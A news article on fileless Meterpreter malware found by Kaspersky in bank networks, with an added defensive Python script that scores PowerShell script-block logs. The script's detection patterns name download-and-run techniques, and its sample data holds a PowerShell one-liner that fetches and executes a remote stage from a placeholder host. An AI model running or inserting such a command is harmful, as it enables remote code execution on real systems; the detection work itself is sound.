Invisible ‘fileless’ malware taking control of banking networks

Usually, malware is loaded from a computer’s hard drive when it starts up. Security software can provide protection by periodically scanning connected drives for previously identified threats. Researchers can begin more detailed investigations by looking for suspect files.
Undetectable malware
Fileless malware is stored entirely in a computer’s working memory. Because it never touches the filesystem, the drive scanning described above cannot see it, which makes it virtually undetectable. It can run for months without anyone noticing, injecting itself into RAM and remaining active until the computer is shut down.
While highly successful, the complexity of the approach has so far prevented it from seeing significant use. However, the technique is now becoming more mainstream, security researchers from Kaspersky Labs reported today. The company has found a form of fileless malware called Meterpreter in 140 networks across 40 countries. The affected systems are predominantly owned by banks and enterprises.
Hijacking system tools
Meterpreter goes the extra mile in covering its tracks. It injects itself into the target’s memory by using genuine system administration tools. Kaspersky discovered it frequently uses malicious Windows PowerShell scripts to hijack machines. The scripts assign memory to Meterpreter and then download the malware straight into RAM.
Kaspersky only discovered Meterpreter in late 2016. It was contacted by a bank after its security team found Meterpreter actively running inside a Windows domain controller, a legitimate part of the operating system. Kaspersky stepped in to complete a forensic investigation, ascertaining that the program was completely fileless.
The company successfully restored a copy of the utility from memory by analysing error dumps from the infected machines. It determined the contents of the malicious PowerShell scripts too, enabling it to piece together how the attack runs to completion. It is still unclear how the PowerShell scripts were delivered to the machines.
Fileless malware heads to the wild
Meterpreter is concerning because it is the first time fileless malware has been used to successfully orchestrate large-scale cyberattacks on major organisations. The hackers behind the malware were using it to force money out of banks, installing the malware on computers operating automatic teller machines.
Less than two years ago, security firm Trend Micro reported that fileless malware had been spotted in the wild for the first time. It warned that more malware creators would be adopting the technique soon. According to Kaspersky, that’s now very much the case. It said incidents of fileless attacks are rising as the technique becomes more widespread.
“Techniques like those described in this report are becoming more common, especially against relevant targets in the banking industry,” the company said. “Unfortunately the use of common tools combined with different tricks makes detection very hard. In fact, detection of this attack would be possible in RAM, network and registry only.”
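The article describes PowerShell scripts that allocate memory and pull the payload straight into RAM, and Kaspersky’s remark that such activity can only be caught in memory, on the network or in the registry. One practical place to look is PowerShell Script Block Logging (Windows event ID 4104), which records the text of every script block as it executes, including the decoded form of anything run through -EncodedCommand. The triage script below is an added illustration written for this article; it is not Kaspersky’s detection logic and not code from the report. It assumes the 4104 events have already been exported to a simple text format (one record per line, fields separated by " | ", a format chosen here for the example), and the indicator patterns, their weights and the alert threshold are assumptions a defender would tune to their own environment. The sample export is constructed, and the one suspicious command in it is built in-line purely so the decoder has something to decode.

```python
"""Heuristic triage of exported PowerShell Script Block Logging (4104) text.

Added example for this article, not Kaspersky's detection logic.
Assumes script-block text has already been exported from the Windows
event log in the constructed format '4104 | <record id> | <script text>'.
"""
import base64
import re
from dataclasses import dataclass, field

# Indicator families and weights (assumed values, tune per environment).
# They target the behaviour the article describes: a script that fetches
# a payload over the network and stages it in memory without touching disk.
INDICATORS = {
    "network_fetch": (2, re.compile(
        r"Net\.WebClient|DownloadString|DownloadData|Invoke-WebRequest", re.I)),
    "in_memory_exec": (3, re.compile(
        r"Invoke-Expression|\bIEX\b|Reflection\.Assembly\]::Load|VirtualAlloc", re.I)),
    "encoded_payload": (2, re.compile(
        r"-EncodedCommand|-enc\b|FromBase64String", re.I)),
    "quiet_launch": (1, re.compile(
        r"-WindowStyle\s+Hidden|-NoProfile|-ExecutionPolicy\s+Bypass|-NonInteractive", re.I)),
}
ALERT_THRESHOLD = 5  # assumed tuning value

# -EncodedCommand / -enc / -e take base64 of UTF-16LE script text.
ENC_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Finding:
    record_id: int
    score: int
    families: list[str] = field(default_factory=list)


def expand_encoded(text: str) -> str:
    """Append the decoded form of any encoded command so the indicators are
    matched against what would actually run, not just the base64 wrapper."""
    decoded = []
    for m in ENC_RE.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1)).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # malformed blob: keep going, the wrapper still scores
    return text + ("\n" + "\n".join(decoded) if decoded else "")


def score_script_block(text: str) -> tuple[int, list[str]]:
    """Return (score, matched indicator families) for one script block."""
    text = expand_encoded(text)
    score, families = 0, []
    for name, (weight, pattern) in INDICATORS.items():
        if pattern.search(text):
            score += weight
            families.append(name)
    return score, families


def parse_records(export: str) -> list[tuple[int, str]]:
    """Split the constructed export into (record_id, script_text) pairs.
    maxsplit=2 keeps pipes inside the script text intact."""
    records = []
    for line in export.strip().splitlines():
        parts = line.split(" | ", 2)
        if len(parts) != 3 or parts[0] != "4104":
            continue
        records.append((int(parts[1]), parts[2]))
    return records


def triage(export: str, threshold: int = ALERT_THRESHOLD) -> list[Finding]:
    """Return the records whose indicator score reaches the alert threshold."""
    findings = []
    for rid, text in parse_records(export):
        score, fams = score_script_block(text)
        if score >= threshold:
            findings.append(Finding(rid, score, fams))
    return findings


# Constructed sample export. Record 102 carries an encoded download-and-run
# one-liner built here so that expand_encoded() has something to decode.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
    .encode("utf-16-le")).decode("ascii")
SAMPLE_EXPORT = f"""
4104 | 101 | Get-ChildItem C:\\Logs -Recurse | Where-Object Length -gt 1MB
4104 | 102 | powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand {_ENCODED}
4104 | 103 | $c = New-Object Net.WebClient; Invoke-Expression $c.DownloadString('http://example.invalid/stage')
4104 | 104 | Restart-Service -Name Spooler
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_EXPORT):
        print(f"record {f.record_id}: score {f.score} ({', '.join(f.families)})")
```

Records 101 and 104 are ordinary administration and score nothing; 103 is flagged on the combination of a network fetch and Invoke-Expression; 102 is flagged only because the encoded command is decoded first, which is the step most worth keeping when adapting this to a real SIEM query. Python was chosen because the work here is offline log analysis rather than administration of the Windows host itself.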
Consumer impact
Fileless malware is less likely to be such a significant concern on desktop PCs. RAM is volatile storage, so its contents are lost each time the machine reboots. Because PCs are typically rebooted on a daily basis, fileless attacks are less likely to succeed against home users.
However, servers running corporate networks are designed for continuous operation, rebooting only if a fault is encountered. The malware can expect to persist in RAM indefinitely, safe in the knowledge it’s almost completely invisible to the outside world. These attacks are therefore likely to concentrate on enterprise systems for the foreseeable future. Fileless invasions of always-on mobile devices and IoT products are also a possibility.